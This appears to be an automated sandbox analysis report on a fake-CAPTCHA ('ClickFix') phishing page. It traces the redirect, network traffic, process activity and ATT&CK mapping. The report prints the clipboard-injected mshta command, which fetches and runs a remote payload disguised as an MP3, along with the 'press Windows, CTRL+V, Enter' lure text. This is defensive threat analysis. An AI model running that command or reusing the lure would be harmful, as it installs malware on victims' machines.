
Windows Analysis Report
https://tavipulse.com/67a0c8749504c05865fba2d3

Overview

General Information

Sample URL: https://tavipulse.com/67a0c8749504c05865fba2d3
Analysis ID: 1633636

Detection

CAPTCHA Scam ClickFix
Score: 80
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detect drive by download via clipboard copy & paste
Suricata IDS alerts for network traffic
Yara detected CAPTCHA Scam ClickFix
HTML page adds suspicious text to clipboard
Phishing site detected (based on various text indicators)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
Detected suspicious crossdomain redirect
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTML page contains hidden javascript code
May sleep (evasive loops) to hinder dynamic analysis
Searches for the Microsoft Outlook file path

Classification

Classification chart labels: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; verdict scale: clean, suspicious, malicious
  • System is w10x64_ra
  • chrome.exe (PID: 6684 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6992 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2020,i,15328997582150657620,6731187250416089749,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2076 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 7004 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://tavipulse.com/67a0c8749504c05865fba2d3" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • mshta.exe (PID: 4456 cmdline: "C:\Windows\system32\mshta.exe" https://music-albums.oss-ap-southeast-7.aliyuncs.com/soundtrack.mp3 # ''? am n?t a r?b?t: ??????? Verification UID: 885203 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
  • cleanup
        Source | Rule | Description | Author | Strings
        1.0.pages.csv | JoeSecurity_CAPTCHAScam | Yara detected CAPTCHA Scam/ ClickFix | Joe Security |
        1.2.pages.csv | JoeSecurity_CAPTCHAScam | Yara detected CAPTCHA Scam/ ClickFix | Joe Security |
        1.1.pages.csv | JoeSecurity_CAPTCHAScam | Yara detected CAPTCHA Scam/ ClickFix | Joe Security |
        No Sigma rule has matched
        Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
        2025-03-10T13:22:04.891651+0100 | 2859486 | 1 | A Network Trojan was detected | 217.142.168.1 | 443 | 192.168.2.16 | 49715 | TCP


        AV Detection

        Source: https://music-albums.oss-ap-southeast-7.aliyuncs.com/soundtrack.mp3 | Avira URL Cloud: Label: malware

        Phishing

        Source: Yara match | File source: 1.0.pages.csv, type: HTML
        Source: Yara match | File source: 1.2.pages.csv, type: HTML
        Source: Yara match | File source: 1.1.pages.csv, type: HTML
        Source: Chrome DOM: 1.1 | OCR Text: Verify You Are Human Please verify that you are a human to continue. I'm not a robot
        Source: Chrome DOM: 1.2 | OCR Text: Verify You Are Human Please veri that ou are a human to continue. Verification Steps 1. Press Windows Button 2. Press CTRL + V 3. Press Enter
        Source: https://objectstorage.ap-singapore-2.oraclecloud.com/n/ax4mqlu25efi/b/rigiho/o/random-check.html | HTTP Parser: Base64 decoded: https://music-albums.oss-ap-southeast-7.aliyuncs.com/soundtrack.mp3
        Source: https://objectstorage.ap-singapore-2.oraclecloud.com/n/ax4mqlu25efi/b/rigiho/o/random-check.html | HTTP Parser: No favicon
        Source: unknown | HTTPS traffic detected: 8.213.160.91:443 -> 192.168.2.16:49732 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 20.140.56.69:443 -> 192.168.2.16:49759 version: TLS 1.2
        Source: chrome.exe | Memory has grown: Private usage: 5MB later: 38MB

        Networking

        Source: Network traffic | Suricata IDS: 2859486 - Severity 1 - ETPRO MALWARE Observed ClickFix Powershell Delivery Page Inbound : 217.142.168.1:443 -> 192.168.2.16:49715
        Source: global traffic | TCP traffic: 192.168.2.16:49714 -> 1.1.1.1:53
        Source: global traffic | TCP traffic: 192.168.2.16:49713 -> 1.1.1.1:53
        Source: global traffic | TCP traffic: 192.168.2.16:49699 -> 1.1.1.1:53
        Source: C:\Program Files\Google\Chrome\Application\chrome.exe | HTTP traffic: Redirect from: tavipulse.com to https://objectstorage.ap-singapore-2.oraclecloud.com/n/ax4mqlu25efi/b/rigiho/o/random-check.html
        Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknown | TCP traffic detected without corresponding DNS query: 52.182.143.211
        Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown | TCP traffic detected without corresponding DNS query: 150.171.29.254
        Source: unknown | TCP traffic detected without corresponding DNS query: 172.217.16.195
        Source: unknown | TCP traffic detected without corresponding DNS query: 199.232.214.172
        Source: unknown | TCP traffic detected without corresponding DNS query: 20.140.56.69
        Source: global traffic | HTTP traffic detected:
            GET /67a0c8749504c05865fba2d3 HTTP/1.1
            Host: tavipulse.com
            Connection: keep-alive
            sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
            sec-ch-ua-mobile: ?0
            sec-ch-ua-platform: "Windows"
            Upgrade-Insecure-Requests: 1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: navigate
            Sec-Fetch-User: ?1
            Sec-Fetch-Dest: document
            Accept-Encoding: gzip, deflate, br, zstd
            Accept-Language: en-US,en;q=0.9
        Source: global traffic | HTTP traffic detected:
            GET /n/ax4mqlu25efi/b/rigiho/o/random-check.html HTTP/1.1
            Host: objectstorage.ap-singapore-2.oraclecloud.com
            Connection: keep-alive
            Upgrade-Insecure-Requests: 1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: navigate
            Sec-Fetch-User: ?1
            Sec-Fetch-Dest: document
            sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
            sec-ch-ua-mobile: ?0
            sec-ch-ua-platform: "Windows"
            Accept-Encoding: gzip, deflate, br, zstd
            Accept-Language: en-US,en;q=0.9
        Source: global traffic | HTTP traffic detected:
            GET /ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css HTTP/1.1
            Host: cdnjs.cloudflare.com
            Connection: keep-alive
            sec-ch-ua-platform: "Windows"
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
            sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
            sec-ch-ua-mobile: ?0
            Accept: text/css,*/*;q=0.1
            Sec-Fetch-Site: cross-site
            Sec-Fetch-Mode: no-cors
            Sec-Fetch-Dest: style
            Sec-Fetch-Storage-Access: active
            Referer: https://objectstorage.ap-singapore-2.oraclecloud.com/
            Accept-Encoding: gzip, deflate, br, zstd
            Accept-Language: en-US,en;q=0.9
        Source: global traffic | HTTP traffic detected:
            GET /favicon.ico HTTP/1.1
            Host: objectstorage.ap-singapore-2.oraclecloud.com
            Connection: keep-alive
            sec-ch-ua-platform: "Windows"
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
            sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
            sec-ch-ua-mobile: ?0
            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: no-cors
            Sec-Fetch-Dest: image
            Referer: https://objectstorage.ap-singapore-2.oraclecloud.com/n/ax4mqlu25efi/b/rigiho/o/random-check.html
            Accept-Encoding: gzip, deflate, br, zstd
            Accept-Language: en-US,en;q=0.9
        Source: global traffic | HTTP traffic detected:
            GET /ajax/libs/font-awesome/6.0.0-beta3/webfonts/fa-brands-400.woff2 HTTP/1.1
            Host: cdnjs.cloudflare.com
            Connection: keep-alive
            Origin: https://objectstorage.ap-singapore-2.oraclecloud.com
            sec-ch-ua-platform: "Windows"
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
            sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
            sec-ch-ua-mobile: ?0
            Accept: */*
            Sec-Fetch-Site: cross-site
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: font
            Referer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
            Accept-Encoding: gzip, deflate, br, zstd
            Accept-Language: en-US,en;q=0.9
        Source: global traffic | HTTP traffic detected:
            GET /soundtrack.mp3 HTTP/1.1
            Accept: */*
            Accept-Language: en-CH
            UA-CPU: AMD64
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
            Host: music-albums.oss-ap-southeast-7.aliyuncs.com
            Connection: Keep-Alive
        Source: global traffic | HTTP traffic detected:
            GET /apc/trans.gif?2ddea2ac0734d0cd624551c56ba6a825 HTTP/1.1
            Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
            Accept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5
            Accept-Language: en-CH
            Accept-Encoding: gzip, deflate, br
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
            Host: fp-afd.azurefd.us
            Connection: Keep-Alive
        Source: global traffic | DNS traffic detected: DNS query: tavipulse.com
        Source: global traffic | DNS traffic detected: DNS query: www.google.com
        Source: global traffic | DNS traffic detected: DNS query: objectstorage.ap-singapore-2.oraclecloud.com
        Source: global traffic | DNS traffic detected: DNS query: cdnjs.cloudflare.com
        Source: global traffic | DNS traffic detected: DNS query: music-albums.oss-ap-southeast-7.aliyuncs.com
        Source: global traffic | HTTP traffic detected:
            HTTP/1.1 404 Not Found
            Content-Type: application/json
            Content-Length: 41
            connection: close
            date: Mon, 10 Mar 2025 12:22:11 GMT
            opc-request-id: xsp-1:jLDghuu-bnPdMkCyZQsdxPAFrcHmMwR-Of5s6Rn5xk2wkOihSIBA7E8XMMyQ1IdN
            x-api-id: native
            x-content-type-options: nosniff
            strict-transport-security: max-age=31536000; includeSubDomains
            access-control-allow-origin: *
            access-control-allow-methods: POST,PUT,GET,HEAD,DELETE,OPTIONS
            access-control-allow-credentials: true
            access-control-expose-headers: access-control-allow-credentials,access-control-allow-methods,access-control-allow-origin,connection,content-length,content-type,date,opc-client-info,opc-request-id,strict-transport-security,x-api-id,x-content-type-options
        Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
        Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
        Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
        Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
        Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
        Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
        Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Windows\SystemTemp\scoped_dir6684_674544651
        Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File deleted: C:\Windows\SystemTemp\scoped_dir6684_674544651
        Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
        Source: classification engine | Classification label: mal80.phis.win@24/1@9/157
        Source: C:\Windows\System32\mshta.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\33CUD2J1\soundtrack[1].mp3
        Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2020,i,15328997582150657620,6731187250416089749,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2076 /prefetch:3
        Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://tavipulse.com/67a0c8749504c05865fba2d3"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://tavipulse.com/67a0c8749504c05865fba2d3"
        Source: unknown | Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://music-albums.oss-ap-southeast-7.aliyuncs.com/soundtrack.mp3 # ''? am n?t a r?b?t: ??????? Verification UID: 885203
        Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: imgutil.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dll
        Source: C:\Windows\System32\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32
        Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
        Source: Window Recorder | Window detected: More than 3 window changes detected

        Persistence and Installation Behavior

        Source: screenshot | OCR Text: e about:blank x X reCAPTCHV3 demo abjectstara ge.ap-sing apore-2.oracl eclo iho/a/random -check. html Verify You Are Human Please veri that ou are a human to continue. Verification Steps 1. Press Windows Button 11 11 2. Press CTRL + V 3. Press Enter 08:22 ENG p Type here to search SG 10/03/2025
        Source: screenshot | OCR Text: e about:blank X reCAPTCHV3 demo abjectstara ge.ap-sing apore-2.oracl eclo iho/a/random -check. html Customize and control Google Chrome Verify You Are Human Please veri that ou are a human to continue. Verification Steps 1. Press Windows Button 2. Press CTRL + V 3. Press Enter 08:23 ENG p Type here to search SG 10/03/2025
        Source: screenshot | OCR Text: -8 about:blank X reCAPTCHV3 demo X abjectstara ge.ap-sing apore-2.oracl eclo iho/a/random -check. html Verify You Are Human Please veri that ou are a human to continue. Verification Steps 1. Press Windows Button Undo Cut 2. Press CTRL + V Copy Paste 3. Press Enter Delete lect All Right to left Reading order x Run Show Unicode control characters Insert Unicode control character Typ et open IME reso Reconversion Open: 08:22 ENG p Type here to search SG 10/03/2025
        Source: screenshot | OCR Text: e about:blank X reCAPTCHV3 demo abjectstara ge.ap-sing apore-2.oracl eclo iho/a/random -check. html Verify You Are Human Please veri that ou are a human to continue. Verification Steps 1. Press Windows Button 2. Press CTRL + V 3. Press Enter 08:22 ENG p Type here to search SG 10/03/2025
        Source: screenshot | OCR Text: e about:blank X reCAPTCHV3 demo abjectstara ge.ap-sing apore-2.oracl eclo iho/a/random -check. html Verify You Are Human Please veri that ou are a human to continue. Verification Steps 1. Press Windows Button 2. Press CTRL + V 3. Press Enter 08:23 ENG p Type here to search SG 10/03/2025
        Source: screenshot | OCR Text: e about:blank X reCAPTCHV3 demo abjectstara ge.ap-sing apore-2.oracl eclo iho/a/random -check. html Verify You Are Human Please veri that ou are a human to continue. Verification Steps 1. Press Windows Button 2. Press CTRL + V 3. Press Enter 08:22 ENG p Type here to search 10/03/2025
        Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Clipboard modification: mshta https://music-albums.oss-ap-southeast-7.aliyuncs.com/soundtrack.mp3 # '' am nt a rbt: VerificationUID:885203
        Source: C:\Windows\System32\mshta.exe | Window / User API: threadDelayed 548
        Source: C:\Windows\System32\mshta.exe TID: 5676 | Thread sleep count: 548 > 30
        Source: C:\Windows\System32\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
MITRE ATT&CK matrix (a number before a technique is the count of triggered signatures mapped to it):

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 2 Browser Extensions | 1 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Virtualization/Sandbox Evasion | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Virtualization/Sandbox Evasion | LSASS Memory | 1 Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Extra Window Memory Injection | 1 Process Injection | Security Account Manager | 3 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 File Deletion | LSA Secrets | Internet Connection Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Extra Window Memory Injection | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |

| Source | Detection | Scanner | Label |
|---|---|---|---|
| https://tavipulse.com/67a0c8749504c05865fba2d3 | 0% | Avira URL Cloud | safe |

No Antivirus matches

| Source | Detection | Scanner | Label |
|---|---|---|---|
| https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/webfonts/fa-brands-400.woff2 | 0% | Avira URL Cloud | safe |
| https://objectstorage.ap-singapore-2.oraclecloud.com/favicon.ico | 0% | Avira URL Cloud | safe |
| https://music-albums.oss-ap-southeast-7.aliyuncs.com/soundtrack.mp3 | 100% | Avira URL Cloud | malware |
| https://fp-afd.azurefd.us/apc/trans.gif?2ddea2ac0734d0cd624551c56ba6a825 | 0% | Avira URL Cloud | safe |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| objectstorage.ap-singapore-2.oci.oraclecloud.com | 217.142.168.1 | true | true | | unknown |
| music-albums.oss-ap-southeast-7.aliyuncs.com | 8.213.160.91 | true | true | | unknown |
| cdnjs.cloudflare.com | 104.17.24.14 | true | false | | high |
| lb-nur-1.6750bdcc5432dff847ed3608.click | 167.235.109.63 | true | false | | unknown |
| www.google.com | 142.250.186.100 | true | false | | high |
| objectstorage.ap-singapore-2.oraclecloud.com | unknown | unknown | false | | unknown |
| tavipulse.com | unknown | unknown | false | | unknown |
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| https://objectstorage.ap-singapore-2.oraclecloud.com/n/ax4mqlu25efi/b/rigiho/o/random-check.html | false | | unknown |
| https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css | false | | high |
| https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/webfonts/fa-brands-400.woff2 | false | Avira URL Cloud: safe | unknown |
| https://music-albums.oss-ap-southeast-7.aliyuncs.com/soundtrack.mp3 | true | Avira URL Cloud: malware | unknown |
| https://objectstorage.ap-singapore-2.oraclecloud.com/favicon.ico | true | Avira URL Cloud: safe | unknown |
| https://tavipulse.com/67a0c8749504c05865fba2d3 | false | | unknown |
| https://fp-afd.azurefd.us/apc/trans.gif?2ddea2ac0734d0cd624551c56ba6a825 | false | Avira URL Cloud: safe | unknown |
| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 104.17.24.14 | cdnjs.cloudflare.com | United States | 13335 | CLOUDFLARENETUS | false |
| 1.1.1.1 | unknown | Australia | 13335 | CLOUDFLARENETUS | false |
| 217.142.168.1 | objectstorage.ap-singapore-2.oci.oraclecloud.com | Sweden | 16253 | BORDERLIGHT-ASVretgrand18SE | true |
| 216.58.212.131 | unknown | United States | 15169 | GOOGLEUS | false |
| 74.125.133.84 | unknown | United States | 15169 | GOOGLEUS | false |
| 142.250.74.206 | unknown | United States | 15169 | GOOGLEUS | false |
| 8.213.160.91 | music-albums.oss-ap-southeast-7.aliyuncs.com | Singapore | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | true |
| 142.251.40.206 | unknown | United States | 15169 | GOOGLEUS | false |
| 167.235.109.63 | lb-nur-1.6750bdcc5432dff847ed3608.click | United States | 3525 | ALBERTSONSUS | false |
| 142.250.181.238 | unknown | United States | 15169 | GOOGLEUS | false |
| 142.250.185.174 | unknown | United States | 15169 | GOOGLEUS | false |
| 142.250.185.163 | unknown | United States | 15169 | GOOGLEUS | false |
| 142.250.185.131 | unknown | United States | 15169 | GOOGLEUS | false |
| 142.250.186.100 | www.google.com | United States | 15169 | GOOGLEUS | false |
| 172.217.16.195 | unknown | United States | 15169 | GOOGLEUS | false |

Private IP: 192.168.2.16
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1633636
Start date and time: 2025-03-10 13:21:19 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsinteractivecookbook.jbs
Sample URL: https://tavipulse.com/67a0c8749504c05865fba2d3
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• EGA enabled
Analysis Mode: stream
Analysis stop reason: Timeout
Detection: MAL
Classification: mal80.phis.win@24/1@9/157
                            • Exclude process from analysis (whitelisted): SIHClient.exe, SgrmBroker.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 142.250.181.238, 142.250.185.163, 142.250.185.174, 74.125.133.84, 216.58.206.46, 142.251.40.206, 173.194.17.198, 142.250.185.131, 216.58.212.131, 23.60.203.209, 20.12.23.50
                            • Excluded domains from analysis (whitelisted): r1.sn-hp57knd6.gvt1.com, fs.microsoft.com, clients2.google.com, accounts.google.com, redirector.gvt1.com, slscr.update.microsoft.com, r1---sn-hp57knd6.gvt1.com, clientservices.googleapis.com, clients.l.google.com, www.gstatic.com
• Not all processes were analyzed; the report is missing behavior information
                            • Report size getting too big, too many NtEnumerateKey calls found.
                            • Report size getting too big, too many NtOpenFile calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
